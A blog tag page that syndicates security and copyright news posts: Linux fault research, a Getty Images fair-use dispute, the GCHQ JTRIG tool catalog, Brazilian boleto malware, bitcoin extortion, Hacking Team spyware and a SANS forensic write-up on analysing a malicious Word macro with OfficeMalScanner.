Posts tagged ‘research’

LWN.net: Faults in Linux 2.6

This post was syndicated from: LWN.net and was written by: jake. Original post: at LWN.net

Six researchers (including Julia Lawall of the Coccinelle project) have just released a paper [PDF] (abstract) that looks at the faults in the 2.6 kernel. “In August 2011, Linux entered its third decade. Ten years before, Chou et al. published a study of faults found by applying a static analyzer to Linux versions 1.0 through 2.4.1. A major result of their work was that the drivers directory contained up to 7 times more of certain kinds of faults than other directories. This result inspired numerous efforts on improving the reliability of driver code. Today, Linux is used in a wider range of environments, provides a wider range of services, and has adopted a new development and release model. What has been the impact of these changes on code quality? To answer this question, we have transported Chou et al.’s experiments to all versions of Linux 2.6; released between 2003 and 2011. We find that Linux has more than doubled in size during this period, but the number of faults per line of code has been decreasing. Moreover, the fault rate of drivers is now below that of other directories, such as arch. These results can guide further development and research efforts for the decade to come. To allow updating these results as Linux evolves, we define our experimental protocol and make our checkers available.
(Thanks to Asger Alstrup Palm.)

LWN.net: [$] Genealogy research with Gramps

This post was syndicated from: LWN.net and was written by: n8willis. Original post: at LWN.net

alt="[Visualization in Gramps]" width=200 height=112/>

Genealogy is a fairly popular pursuit, and those wishing to use open-source
software in their hobby have their choice cut-out for them—Gramps is the only complete, actively-developed free-software solution. The project was started in 2001 and
initially known as GRAMPS; the first
stable release
was in 2004. The
latest, version 4.1.0 (“Name go in
book”) was
released on June 18.

Schneier on Security: Security Against Traffic Analysis of Cloud Data Access

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Here’s some interesting research on foiling traffic analysis of cloud storage systems.

Press release.

The Hacker Factor Blog: Dear Getty Images Legal Department

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

For the last few years, Getty Images has operated an aggressive anti-copyright infringement campaign. In 2011, they purchased PicScout to search the Internet for potential unlicensed uses of their pictures. Then they began sending out very scary-sounding takedown notices. These letters include a “cease and desist” paragraph as well as a bill for the unauthorized use.

I just received one of these letter. Here’s the 7-page (3.4 MB) letter: PDF. (The only thing I censored was the online access code for paying online.) They billed me $475 for a picture used on my blog. (If you log into their site, it’s $488 with tax.)

A number of news outlets as well as the blogosphere have begun reporting on these letters from Getty Images. For example:

  • International Business Times: “Getty Images Lawsuits: Enforcement Or Trolling? Fear Of Letters Dwindling, Stock-Photo Giant Hits Federal Courts”

  • The DG Group: “Image Copyright Infringement And Getty Images Scam Letter”
  • Extortion Letter Info: “Reporting on Getty Images & Stock Photo Settlement Demand Letters (Copyright Trolls, ‘Extortion’ Letters, ‘Shadown’ Letters)”
  • Women in Business: “Are You Being Set Up For Copyright Infringement? As Technology Becomes More Invasive Copyright Infringement Scams Flourish”
  • RyanHealy.com: “Getty Images Extortion Letter”
  • someguy72 @ Reddit: He states that he purchased the pictures legally from Getty and still received an infringement notice. His advice: if you purchase a picture from Getty, the “save your records FOREVER… they will come after you, years later and you might not have PROOF of PURCHASE, and then you will be screwed.”

As far as I can tell, this is an extortion racket. (I’m surprised that there hasn’t been a class-action lawsuit against Getty Images yet.) The basic premise is that they send out a threatening letter with a price tag. Some people will fear the strongly-worded letter and simply pay the amount. If you ignore it, then they send more letters with greater dollar amounts. If you call them up, the forums say that you can usually negotiate a lower amount. However, sometimes you may not actually owe anything at all.

Many people have reported that, if you just ignore it, then it goes away. However, Getty Images has sued a few people who ignored the letters. If you ignore it, then you place yourself at risk.

But here’s the thing… There are some situations where you can use the image without a license. It is in the Copyright law under the heading “Fair Use” (US Copyright Law Title 17 Section 107; in some countries, it’s called “Fair Dealing”). This is an exception from copyright enforcement. Basically, if you’re using the picture as art on your web site or to promote a product, then you are violating their copyright. (You should negotiate a lower rate.) However, if you use it for criticism, comment, news reporting, teaching, scholarship, or research, then you are allowed to use the picture.

For example, I have many blog entries where I forensically evaluate pictures. I do this to show techniques, criticize content, identify deceptive practices, etc. If Fair Use did not exist, then I would be unable to criticize or expose deception from media outlets. In effect, they would be censoring my freedom of speech by preventing me from directly addressing the subject.

Reply To Getty

The picture in question is one that is on an older blog entry: In The Flesh. This blog entry criticizes the media outlets Time and Salon for promoting misleading and hostile software. (It’s hostile because the demo software installs malware.) The software, False Flesh, claims to make people in any picture appear nude. The pictures in my blog entry are used to demonstrate some of the deceptive practices. Specifically, the pictures of nude women on the software’s web site did not come from their software.

I looked at the picture mentioned in Getty’s complaint and how it was being used in the blog entry. I really thought it was permitted under Copyright Fair Use. However, I’m not an attorney. So… I checked with an attorney about the Getty complaint and my use of the picture. I was actually surprised that he didn’t start his answer with “that depends…” (If you’ve every worked with an attorney, then you know any discussion about legality begins with them saying “that depends…”) Instead, he said outright “it’s clearly fair use.”

Personally, I’m offended that Getty Images made no attempt to look at the context in which the picture is used.

Rather than ignoring them, I sent them a letter:

Dr. Neal Krawetz
Hacker Factor
PO Box 270033
Fort Collins, CO
80527-0033

July 15, 2014

Legal Department
Getty Images
605 5th Ave S, Suite 400
Seattle, WA
98104

Dear Getty Images Legal Department,

I received your copyright infringement notification dated “7/10/2014 11:05:06 AM”, case number 371842247, on July 14, 2014. I have reviewed the image, the use of the picture on my web site, and discussed this situation with an attorney. It is my strong belief that I am clearly using the picture within the scope of Copyright Fair Use (Title 17 Section 107).

Specifically:

  • The blog entry, titled “In The Flesh”, criticizes the media outlets Time and Salon for promoting deceptive software. The software is called “False Flesh” and claims to turn any photo of a person into a nude. I point out that installing the False Flesh demo software will install malware.

  • The blog entry discloses research findings regarding the False Flesh software: there is no identified owner for the software and the sample pictures they use to demonstrate their software are not from their software. I specifically traced their sample images to pictures from sites such as Getty Images. I forensically evaluate the pictures and explicitly point out the misrepresentation created by these images on the False Flesh web site.
  • The picture is used on my web site to criticize the media reports by exposing fraud and misrepresentation associated with the product. It is also included as part of a demonstration for tracking and identifying potentially fraudulent products in general.
  • The blog entry reports on these findings to the public in order to educate people regarding the deceptive nature of False Flesh and the risks from using this software.
  • The image that you identified is not used is the blog entry to promote any products or services and is directly related to the comments, criticism, and research covered in the blog entry. The use is not commercial in nature. This goes toward the purpose and character, which is to identify fraud and misrepresentation in a product promoted by Time and Salon.
  • As described in the blog entry, I found sample images on the False Flesh web site and used TinEye and other forensic methods to identify the sources. This was used to prove that the False Flesh software did not generate any of their sample images.
  • I did not use the full-size version of this particular picture and it includes the Getty Images Image Bank watermark. The blog entry explicitly identifies that the source for the False Flesh picture was Getty Images and not False Flesh. I point out that False Flesh used the picture in a deceptive manner.
  • I believe that my use of this picture has no adverse effect on the potential market for the image.

I believe that this covers the Copyright Fair Use requirements for criticism, comment, teaching, research, and reporting.

Getty Images acknowledges Fair Use in their FAQ concerning license requirements:
http://company.gettyimages.com/license-compliance/faq/#are-there-limitations-on-a-copyright-owners-rights

Specifically, Getty Images calls out education and research. As a computer security and forensic researcher, I use this blog to describe tools and techniques, evaluate methodologies, and to identify deceptive practices. I believe that this specific blog entry, and my blog in general, clearly fit both of these areas.

As stated in this letter, the picture’s appearance on my blog is Fair Use and I have the right under copyright law to use the image without your consent. This letter serves as notice that any DMCA takedown or blocking notices to any third party would be in bad faith.

Sincerely,

/s/ Dr. Neal Krawetz

Chilling Effect

My blog in general reports on findings related to computer security and forensics. Many of these blog entries heavily focus on scams, fraud, and abuse from media outlets. Many of my blog entries (reports) have been repeated by news outlets, and some of my blog entries have had a direct effect on changing insecure and unethical practices. This includes a series of blog entries that exposed digital manipulation in World Press Photo’s annual contest (influencing changes in this year’s contest rules) and a paper on fundamental problems with credit card payment systems that lead to changes in the Visa security standards.

While this could be a wide-spread extortion racket, it could also be Getty’s way of testing the waters before going after some blog entries where I openly and explicitly criticize them for releasing digitally altered photos.

My primary concern is the chilling effect this could have. If I pay the extortion, then it opens me for more claims from Getty; I have previously criticized them for providing digitally altered photos and performed analysis to prove it. It also opens the way for similar claims from the Associated Press, Reuters, and every other media outlet that I have openly criticized. All of my blog entries that explicitly expose digital misrepresentation, report on media manipulation, and even those that disclose methods for evaluating content will be at risk.

In effect, bowing to this one threatening letter would force me to close my blog since I would no longer be allowed to freely write — report, comment, disclose research, and educate others — on topics related to media manipulation and digital photo analysis. I consider Getty’s attempt to censor my blog’s content to be an unacceptable attack on my freedom of speech.

LWN.net: Google’s “Project Zero”

This post was syndicated from: LWN.net and was written by: corbet. Original post: at LWN.net

Google’s newly announced
Project Zero is focused on making the net as a whole safer from attackers.
We’re not placing any particular bounds on this project and will
work to improve the security of any software depended upon by large numbers
of people, paying careful attention to the techniques, targets and
motivations of attackers. We’ll use standard approaches such as locating
and reporting large numbers of vulnerabilities. In addition, we’ll be
conducting new research into mitigations, exploitation, program
analysis—and anything else that our researchers decide is a worthwhile
investment.
” Their policy of only reporting bugs to the vendor
looks like it could result in the burying of inconvenient vulnerabilities,
but presumably they have thought about that.

TorrentFreak: File-Sharing Doesn’t Hurt Box Office Revenue, Research Finds

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

piracy-progressResearch into online piracy comes in all shapes and sizes, often with equally mixed results. Often the main question is whether piracy is hurting sales.

A new study conducted by economist Koleman Strumpf is one of the most comprehensive on the subject so far.

Drawing on data from a popular BitTorrent tracker and revenue projections from the Hollywood Stock Exchange he researches how the release of a pirated movie affects expected box office income.

The research covers 150 of the most popular films that were released over a period of seven years, and the findings reveal that the release of pirated films on file-sharing sites doesn’t directly hurt box office revenue.

“There is no evidence in my empirical results of file-sharing having a significant impact on theatrical revenue,” Strumpf tells TorrentFreak in a comment.

“My best guess estimate is that file sharing reduced the first month box office by $200 million over 2003-2009, which is only three tenths of a percent of what movies actually earned. I am unable to reject the hypothesis that there is no impact at all of file-sharing on revenues.”

So while there is a small negative effect, this is limited to three tenth of a percent and not statistically significant.

Interestingly, the data also reveals that movie leaks shortly before the premiere have a small positive impact on expected revenues. This suggests that file-sharing may serve as a form of promotion.

“One consistent result is that file-sharing arrivals shortly before the theatrical opening have a modest positive effect on box office revenue. One explanation is that such releases create greater awareness of the film. This is also the period of heaviest advertising,” Strumpf notes.

One of the advantages of this study compared to previous research is that it measures the direct effect of a movie leak on projected box office revenues. Previous studies mostly compared early versus late leaks, which is less accurate and may be influenced by other factors.

“For example, suppose studios added extra security to big budget movies which then have a delayed arrival to file-sharing networks. Then even if file-sharing has no impact at all, one would find that delayed arrival on file-sharing leads to higher revenues,” Strumpf tells us.

Another upside of the research lies in the statistical precision. The data includes thousands of daily observations and relatively precise estimates, something lacking in most previous studies.

The downside, on the other hand, is that the expected box office impact is estimated from the Hollywood Stock Exchange. While this has shown to be a good predictor for actual revenues, it’s not a direct measurement.

In any case, the paper suggests that file-sharing might not be the biggest threat the movie industry is facing.

Even if the negative effects were twice as big as the data suggests, it would still be less than the $500 million Hollywood spent on the MPAA’s anti-piracy efforts during the same period.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Schneier on Security: GCHQ Catalog of Exploit Tools

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

The latest Snowden story is a catalog of exploit tools from JTRIG (Joint Threat Research Intelligence Group), a unit of the British GCHQ, for both surveillance and propaganda. It’s a list of code names and short descriptions, such as these:

GLASSBACK: Technique of getting a targets IP address by pretending to be a spammer and ringing them. Target does not need to answer.

MINIATURE HERO: Active skype capability. Provision of real time call records (SkypeOut and SkypetoSkype) and bidirectional instant messaging. Also contact lists.

MOUTH: Tool for collection for downloading a user’s files from Archive.org.

PHOTON TORPEDO: A technique to actively grab the IP address of MSN messenger user.

SILVER SPECTOR: Allows batch Nmap scanning over Tor.

SPRING BISHOP: Find private photographs of targets on Facebook.

ANGRY PIRATE: is a tool that will permanently disable a target’s account on their computer.

BUMPERCAR+: is an automated system developed by JTRIG CITD to support JTRIG BUMPERCAR operations. BUMPERCAR operations are used to disrupt and deny Internet-based terror videos or other materials. The techniques employs the services provided by upload providers to report offensive materials.

BOMB BAY: is the capacity to increase website hits/rankings.

BURLESQUE: is the capacity to send spoofed SMS messages.

CLEAN SWEEP: Masquerade Facebook Wall Posts for individuals or entire countries.

CONCRETE DONKEY: is the capacity to scatter an audio message to a large number of telephones, or repeatedely bomb a target number with the same message.

GATEWAY: Ability to artificially increase traffic to a website.

GESTATOR: amplification of a given message, normally video, on popular multimedia websites (Youtube).

SCRAPHEAP CHALLENGE: Perfect spoofing of emails from Blackberry targets.

SUNBLOCK: Ability to deny functionality to send/receive email or view material online.

SWAMP DONKEY: is a tool that will silently locate all predefined types of file and encrypt them on a targets machine

UNDERPASS: Change outcome of online polls (previously known as NUBILO).

WARPATH: Mass delivery of SMS messages to support an Information Operations campaign.

HAVLOCK: Real-time website cloning techniques allowing on-the-fly alterations.

HUSK: Secure one-on-one web based dead-drop messaging platform.

There’s lots more. Go read the rest. This is a big deal, as big as the TAO catalog from December.

I would like to post the entire list. If someone has a clever way of extracting the text, or wants to retype it all, please send it to me.

EDITED TO ADD (7/16): HTML of the entire catalog is here.

Krebs on Security: Brazilian ‘Boleto’ Bandits Bilk Billions

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

With the eyes of the world trained on Brazil for the 2014 FIFA World Cup, it seems a fitting time to spotlight a growing form of computer fraud that’s giving Brazilian banks and consumers a run for their money. Today’s post looks at new research into a mostly small-time cybercrime practice that in the aggregate appears to have netted thieves the equivalent of billions of dollars over the past two years.

A boleto.

A boleto.

At issue is the “boleto” (officially “Boleto Bancario”), a popular payment method in Brazil that is used by consumers and for most business-to-business payments. Brazilians can use boletos to complete online purchases via their bank’s Web site, but unlike credit card payments — which can be disputed and reversed — payments made via boletos are not subject to chargebacks and can only be reverted by bank transfer.

Brazil has an extremely active and talented cybercrime underground, and increasingly Brazilian organized  crime gangs are setting their sights on boleto users who bank online. This is typically done through malware that lies in wait until the user of the hacked PC visits their bank’s site and fills out the account information for the recipient of a boleto transaction. In this scenario, the unwitting victim submits the transfer for payment and the malware modifies the request by substituting a recipient account that the attackers control.

Many of the hijacked boleto transactions are low-dollar amounts, but in the aggregate these purloined payments can generate an impressive income stream for even a small malware gang. On Tuesday, for example, a source forwarded me a link to a Web-based control panel for a boleto-thieving botnet (see screenshot below); in this operation, we can see that the thieves had hijacked some 383 boleto transactions between February 2014 and the end of June, but had stolen the equivalent of nearly USD $250,000 during that time.

The records kept by a boleto-stealing botnet. Next to the date and time is the account of the intended recipient of the transfer; the "linea alterada" column shows the accounts used by the thieves to accept diverted payments. "Valor" refers to the amount, expressed in Brazilian Real.

The records kept by a boleto-stealing botnet. Next to the date and time is the account of the intended recipient of the transfer; the “linha alterada” column shows the accounts used by the thieves to accept diverted payments. “Valor” refers to the amount, expressed in Brazilian Real.

But a recent discovery by researchers at RSA, the security division of EMC, exposes far more lucrative and ambitious boleto banditry. RSA says the fraud ring it is tracking — known as the “Bolware” operation — affects more than 30 different banks in Brazil, and may be responsible for up to $3.75 billion USD in losses. RSA arrived at this estimate based on the discovery of a similar botnet control panel that tracked nearly a half-million fraudulent transactions.

Most Brazilian banks require online banking customers to install a security plug-in that hooks into the user’s browser. The plug-ins are designed to help block malware attacks. But according to RSA, the Bolware gang’s malware successfully disables those security plug-ins, leaving customers with a false sense of security when banking online.

The malware also harvests usernames and passwords from victim PCs, credentials that are thought to be leveraged in spreading the malware via spam to the victim’s contacts. RSA said this fraud gang appears to have infected more than 192,000 PCs, and stolen at least 83,000 sets of user credentials.

Administration screen of the Bolware gang shows the original Boleto numbers "Bola Original" and their destination bank "Bola".  Image: RSA

Administration screen of the Bolware gang shows the original Boleto numbers “Bola Original” and their destination bank “Bola”. Image: RSA

RSA notes that the miscreants responsible for the Bolware operation appear to have used just over 8,000 separate accounts to receive the stolen funds. That’s roughly 7,997 more accounts than were used by the boleto bandits responsible for the diverted transactions in the boleto botnet control panel I discovered.

Researchers at RSA suggest that Brazilians who wish to transact in boletos online should consider using a mobile device to manage their boleto transactions, noting that boleto-thieving malware currently is not capable of altering the data stored in the barcode of each hijacked boleto order — at least for the time being.

“As the malware does not alter the barcode (for now), the safest approach is to use mobile banking applications available on smart phones (for now, immune to this malware) to read the barcode and to make payments,” the company said in its report (PDF) on this crime wave.

Schneier on Security: How Traffic Shaping Can Help the NSA Evade Legal Oversight

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

New research paper on how the NSA can evade legal prohibitions against collecting Internet data and metadata on Americans by forcing domestic traffic to leave and return to the US. The general technique is called “traffic shaping,” and has legitimate uses in network management.

From a news article:

The Obama administration previously said there had been Congressional and Judicial oversight of these surveillance laws — notably Section 215 of the Patriot Act, which authorized the collection of Americans’ phone records; and Section 702 of the Foreign Intelligence Surveillance Act (FISA), which authorized the controversial PRISM program to access non-U.S. residents’ emails, social networking, and cloud-stored data.

But the researchers behind this new study say that the lesser-known Executive Order (EO) 12333, which remains solely the domain of the Executive Branch — along with United States Signals Intelligence Directive (USSID) 18, designed to regulate the collection of American’s data from surveillance conducted on foreign soil — can be used as a legal basis for vast and near-unrestricted domestic surveillance on Americans.

The legal provisions offered under EO 12333, which the researchers say “explicitly allows for intentional targeting of U.S. persons” for surveillance purposes when FISA protections do not apply, was the basis of the authority that reportedly allowed the NSA to tap into the fiber cables that connected Google and Yahoo’s overseas to U.S. data centers.

An estimated 180 million user records, regardless of citizenship, were collected from Google and Yahoo data centers each month, according to the leaked documents. The program, known as Operation MUSCULAR, was authorized because the collection was carried out overseas and not on U.S. soil, the researchers say.

The paper also said surveillance can also be carried out across the wider Internet by routing network traffic overseas so it no longer falls within the protection of the Fourth Amendment.

We saw a clumsy example of this in 2013, when a bunch of Internet traffic was mysteriously routed through Iceland. That one was the result of hacking the Border Gateway Protocol (BGP). I assure you that the NSA’s techniques are more effective and less obvious.

Krebs on Security: 2014: The Year Extortion Went Mainstream

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

The year 2014 may well go down in the history books as the year that extortion attacks went mainstream. Fueled largely by the emergence of the anonymous online currency Bitcoin, these shakedowns are blurring the lines between online and offline fraud, and giving novice computer users a crash course in modern-day cybercrime.

An extortion letter sent to 900 Degrees Neapolitan Pizzeria in New Hampshire.

An extortion letter sent to 900 Degrees Neapolitan Pizzeria in New Hampshire.

At least four businesses recently reported receiving “Notice of Extortion” letters in the U.S. mail. The letters say the recipient has been targeted for extortion, and threaten a range of negative publicity, vandalism and harassment unless the target agrees to pay a “tribute price” of one bitcoin (currently ~USD $561) by a specified date. According to the letter, that tribute price increases to 3 bitcoins (~$1,683) if the demand isn’t paid on time.

The ransom letters, which appear to be custom written for restaurant owners, threaten businesses with negative online reviews, complaints to the Better Business Bureau, harassing telephone calls, telephone denial-of-service attacks, bomb threats, fraudulent delivery orders, vandalism, and even reports of mercury contamination.

The missive encourages recipients to sign up with Coinbase – a popular bitcoin exchange – and to send the funds to a unique bitcoin wallet specified in the letter and embedded in the QR code that is also printed on the letter.

Interestingly, all three letters I could find that were posted online so far targeted pizza stores. At least two of them were mailed from Orlando, Florida.

The letters all say the amounts are due either on Aug. 1 or Aug. 15. Perhaps one reason the deadlines are so far off is that the attackers understand that not everyone has bitcoins, or even knows about the virtual currency.

“What the heck is a BitCoin?” wrote the proprietors of New Hampshire-based 900 Degrees Neapolitan Pizzeria, which posted a copy of the letter (above) on their Facebook page.

Sandra Alhilo, general manager of Pizza Pirates in Pomona, Calif., received the extortion demand on June 16.

“At first, I was laughing because I thought it had to be a joke,” Alhilo said in a phone interview. “It was funny until I went and posted it on our Facebook page, and then people put it on Reddit and the Internet got me all paranoid.”

Nicholas Weaver, a researcher at the International Computer Science Institute (ICSI) and at the University California, Berkeley, said these extortion attempts cost virtually nothing and promise a handsome payoff for the perpetrators.

“From the fraudster’s perspective, the cost of these attacks is a stamp and an envelope,” Weaver said. “This type of attack could be fairly effective. Some businesses — particularly restaurant establishments — are very concerned about negative publicity and reviews. Bad Yelp reviews, tip-offs to the health inspector..that stuff works and isn’t hard to do.”

While some restaurants may be an easy mark for this sort of crime, Weaver said the extortionists in this case are tangling with a tough adversary — The U.S. Postal Service — which takes extortion crimes perpetrated through the U.S. mail very seriously.

“There is a lot of operational security that these guys might have failed at, because this is interstate commerce, mail fraud, and postal inspector territory, where the gloves come off,” Weaver said. “I’m willing to bet there are several tools available to law enforcement here that these extortionists didn’t consider.”

It’s not entirely clear if or why extortionists seem to be picking on pizza establishments, but it’s probably worth noting that the grand-daddy of all pizza joints – Domino’s Pizza in France — recently found itself the target of a pricey extortion attack earlier this month after hackers threatened to release the stolen details on more than 650,000 customers if the company failed to pay a ransom of approximately $40,000).

Meanwhile, Pizza Pirates’s Alhilo says the company has been working with the local U.S. Postal Inspector’s office, which was very interested in the letter. Alhilo said her establishment won’t be paying the extortionists.

“We have no intention of paying it,” she said. “Honestly, if it hadn’t been a slow day that Monday I might have just throw the letter out because it looked like junk mail. It’s annoying that someone would try to make a few bucks like this on the backs of small businesses.”

A GREAT CRIME FOR CRIMINALS

Fueled largely by the relative anonymity of cryptocurrencies like Bitcoin, extortion attacks are increasingly being incorporated into all manner of cyberattacks today. Today’s thieves are no longer content merely to hijack your computer and bandwidth and steal all of your personal and financial data; increasingly, these crooks are likely to hold all of your important documents for ransom as well.

“In the early days, they’d steal your credit card data and then threaten to disclose it only after they’d already sold it on the underground,” said Alan Paller, director of research at the SANS Institute, a Bethesda, Md. based security training firm. “But today, extortion is the fastest way for the bad guys to make money, because it’s the shortest path from cybercrime to cash. It’s really a great crime for the criminals.

Last month, the U.S. government joined private security companies and international law enforcement partners to dismantle a criminal infrastructure responsible for spreading Cryptlocker, a ransomware scourge that the FBI estimates stole more than $27 million from victims compromised by the file-encrypting malware.

Even as the ink was still drying on the press releases about the Cryptolocker takedown, a new variant of Cryptolocker — Cryptowall — was taking hold. These attacks encrypt the victim PC’s hard drive unless and until the victim pays an arbitrary amount specified by the perpetrators — usually a few hundred dollars worth of bitcoins. Many victims without adequate backups in place (or those whose backups also were encrypted) pay up.  Others, like the police department in the New Hampshire hamlet of Durham, are standing their ground.

The downside to standing your ground is that — unless you have backups of your data — the encrypted information is gone forever. When these attacks hit businesses, the results can be devastating. Code-hosting and project management services provider CodeSpaces.com was forced to shut down this month after a hacker gained access to its Amazon EC2 account and deleted most data, including backups. According to Computerworld, the devastating security breach happened over a span of 12 hours and initially started with a distributed denial-of-service attack followed by an attempt to extort money from the company.

A HIDDEN CRIME

Extortion attacks against companies operating in the technology and online space are nothing new, of course. Just last week, news came to light that mobile phone giant Nokia in 2007 paid millions to extortionists who threatened to reveal an encryption key to Nokia’s Symbian mobile phone source code.

Trouble is, the very nature of these scams makes it difficult to gauge their frequency or success.

“The problem with extortion is that the money is paid in order to keep the attack secret, and so if the attack is successful, there is no knowledge of the attack even having taken place,” SANS’s Paller said.

Traditionally, the hardest part about extortion has been getting paid and getting away with the loot. In the case of the crooks who extorted Nokia, the company paid the money, reportedly leaving the cash in a bag at an amusement park car lot. Police were tracking the drop-off location, but ultimately lost track of the blackmailers.

Anonymous virtual currencies like Bitcoin not only make it easier for extortionists to get paid, but they also make it easier and more lucrative for more American blackmailers to get in on the action. Prior to Bitcoin’s rise in popularity, the principal way that attackers extracted their ransom was by instructing victims to pay by wire transfer or reloadable prepaid debit cards — principally Greendot cards sold at retailers, convenience stores and pharmacies.

But unlike Bitcoin payments, these methods of cashing out are easily traceable if cashed out in within the United States, the ICSI’s Weaver said.

“Bitcoin is their best available tool if in they’re located in the United States,” Weaver said of extortionists. “Western Union can be traced at U.S. cashout locations, as can Greendot payments. Which means you either need an overseas partner [who takes half of the profit for his trouble] or Bitcoin.”

Schneier on Security: More on Hacking Team’s Government Spying Software

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Hacking Team is an Italian malware company that sells exploit tools to governments. Both Kaspersky Lab and Citizen Lab have published detailed reports on its capabilities against Android, iOS, Windows Mobile, and BlackBerry smart phones.

They allow, for example, for covert collection of emails, text messages, call history and address books, and they can be used to log keystrokes and obtain search history data. They can take screenshots, record audio from the phones to monitor calls or ambient conversations, hijack the phone’s camera to snap pictures or piggyback on the phone’s GPS system to monitor the user’s location. The Android version can also enable the phone’s Wi-Fi function to siphon data from the phone wirelessly instead of using the cell network to transmit it. The latter would incur data charges and raise the phone owner’s suspicion.

[...]

Once on a system, the iPhone module uses advance techniques to avoid draining the phone’s battery, turning on the phone’s microphone, for example, only under certain conditions.

“They can just turn on the mic and record everything going on around the victim, but the battery life is limited, and the victim can notice something is wrong with the iPhone, so they use special triggers,” says Costin Raiu, head of Kaspersky’s Global Research and Analysis team.

One of those triggers might be when the victim’s phone connects to a specific WiFi network, such as a work network, signaling the owner is in an important environment. “I can’t remember having seen such advanced techniques in other mobile malware,” he says.

Hacking Team’s mobile tools also have a “crisis” module that kicks in when they sense the presence of certain detection activities occurring on a device, such as packet sniffing, and then pause the spyware’s activity to avoid detection. There is also a “wipe” function to erase the tool from infected systems.

Hacking Team claims to sell its tools only to ethical governments, but Citizen Lab has found evidence of their use in Saudi Arabia. It can’t be certain the Saudi government is a customer, but there’s good circumstantial evidence. In general, circumstantial evidence is all we have. Citizen Lab has found Hacking Team servers in many countries, but it’s a perfectly reasonable strategy for Country A to locate its servers in Country B.

And remember, this is just one example of government spyware. Assume that the NSA — as well as the governments of China, Russia, and a handful of other countries — have their own systems that are at least as powerful.

TorrentFreak: Dotcom’s Internet Party Wants to Abolish “Geo Blocking” Restrictions

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

internetpartyLast January, exactly two years after the Megaupload raid, Kim Dotcom entered New Zealand’s political arena with the launch of his Internet Party.

The party is currently preparing for the general election in September. While Dotcom will not be on the voting ballot himself, he remains one of the main influencers of the party’s policy.

As the name suggests, many of the party’s core issues revolve around the Internet, copyright included. Today the Internet Party released a draft of its copyright policy with several suggestions for an overhaul of current legislation.

One of the key issues the Internet Party wants to change is the liability New Zealanders face for using VPN services and other circumvention tools to access legal content. At the moment, it is illegal for them to stream content from U.S-based Hulu and Netflix via proxies or VPNs.

TorrentFreak spoke with Kim Dotcom who notes that consumers shouldn’t be punished for the inability of Hollywood to release its content globally. Dotcom hopes that these changes will eventually put a stop to the unnecessary release delays.

“The primary goal of this policy is to force copyright holders to release their content globally, without geographical restrictions. If a TV-show is not available in New Zealand for three months after the U.S. release, there should be no enforcement during this period,” Dotcom tells us.

“Content owners should be held responsible, not the public. The ‘geo blocking’ proposal forces Hollywood to change its business model and release its content worldwide without delays,” he adds.

Dotcom hopes that the Internet Party proposal will serve as model for future copyright law that will eventually be adopted around the world.

Hulu’s Geo Blocking
hului-block

Internet Party leader Laila Harré notes that the current situation is unmanageable. The Internet has made it possible to release content worldwide without any delays, but content owners refuse to give consumers what they want.

“A Kiwi who wants to watch the latest season of first run TV shows like Games of Thrones, for example, shouldn’t be forced to jump through hoops to access what should be legally and easily available online. It’s a ridiculous situation in this day and age,” Harré notes.

Thus far most progress has subsequently been drawn in the opposite direction. In an attempt to crack down on people who bypass geo restrictions, Hulu recently started to ban all visitors who use a VPN connection.

Instead of fighting circumvention, the Internet Party believes that copyright holders should address the root of the problem themselves. Making sure that the latest TV-shows can be watched legally is a must, and although some progress has been made over the years, the legal options are still lacking.

“Some excellent work has been done by some copyright owners and content providers to make good legal options available to New Zealanders. But there’s still a long way to go, especially for some types of content such as globally popular first run television shows broadcast overseas but not available in New Zealand for weeks or months, if at all,” Harré says.

Aside from geo blocking issues, the Internet Party also wants to abolish the Internet disconnection sanction available under New Zealand’s “three-strikes” law, and strengthen the “safe harbor” provisions for Internet services to prevent abuse by copyright holders.

The full draft of the Internet Party’s copyright and open research policy is available here.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

SANS Internet Storm Center, InfoCON: green: OfficeMalScanner helps identify the source of a compromise, (Sun, Jun 22nd)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

While working a recent forensics case I had the opportunity to spread the proverbial wings a bit and utilize a few tools I had not prior.
In the midst of building my forensic timeline I set out to determine the initial attack vector, operating on the assumption that it was either web-based content via a malicious ad or a site compromised with a web exploit kit, or was a malicious link or document attachment via email. One interesting variable stood out while reviewing the victim’s PST file. Her company was in the midst of hiring, seeking candidates for a few positions, and was receiving numerous emails with resume attachments, both PDF and DOC/DOCX. I had already discovered the primary malware compromise of the victim’s system so I simply needed to see if there was a malicious email that had arrived prior based on time stamps. One particular email with a Word doc attached stood right out as it arrived at 12:23am on the same day of the malware compromise later at noon. Antimalware detection immediately identified the attachment as TrojanDownloader:W97M/Ledod.A. This alleged resume attachment was also for a John Cena, which cracked me up as I am indeed familiar with the WWE professional wrestler of the same name. Unfortunately, technical details for W97M/Ledod.A were weak at best and all I had to go from initially was “this trojan can download and run other malware or potentially unwanted software onto your PC.” Yeah, thanks for that. What is a poor forensicator to do? Frank Boldewin’s (Reconsructer.org) OfficeMalScanner to the rescue! This tool works like a charm when you want a quick method to scan for shellcode and encrypted PE files as well as pulling macro details from a nasty Office documents. As always, when you choose to interact with mayhem, it’s best to do so in an isolated environment; I run OfficeMalScanner on Windows 7 virtual machine. If you just run OfficeMalScanner with out defining any parameters, it kindly dumps options for you as seen in Figure 1.

OfficeMalScanner options

Figure 1

For this particular sample, when I ran OfficeMalScanner.exe "John Cena Resume.doc" scan the result “No malicious traces found in this file!” was returned. As the tool advised me to do, I ran OfficeMalScanner.exe "John Cena Resume.doc" info as well and struck pay dirt as seen in Figure 2.

OfficeMalScanner finds macros code

Figure 2

When I opened ThisDocument from C:\tools\OfficeMalScanner\JOHN CENA RESUME.DOC-Macros I was treated to the URL and executable payload I was hoping for as seen in Figure 3.

OfficeMalScanner results

Figure 3

